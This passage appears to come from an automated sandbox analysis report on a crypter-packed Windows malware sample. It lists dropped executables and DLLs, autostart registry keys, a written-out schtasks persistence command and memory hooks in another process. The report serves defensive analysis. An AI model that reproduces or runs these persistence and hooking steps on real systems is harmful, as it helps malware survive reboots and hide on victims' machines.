                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile created: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\sdhsfd[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66ecb454d2b4a_lgfdsjgds[1].exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeFile created: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66eea6336b153_app16540406983468141987[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\userAEBAKJDGHI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\userHJDBAFIECG.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-5R4JI.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-RB7TG.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66edb89bc4073_crypted[1].exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\nikkovideocompressor32.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeFile created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\lgsfdam[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\EGCBAFCFIJ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BEGLA.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-TS51E.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\EGCBAFCFIJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeFile created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeJump to dropped file

                        Boot Survival

                        barindex
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DellJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DellJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DellJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeMemory written: PID: 6060 base: 7FF9082F0008 value: E9 EB D9 E9 FF
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeMemory written: PID: 6060 base: 7FF90818D9F0 value: E9 20 26 16 00
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
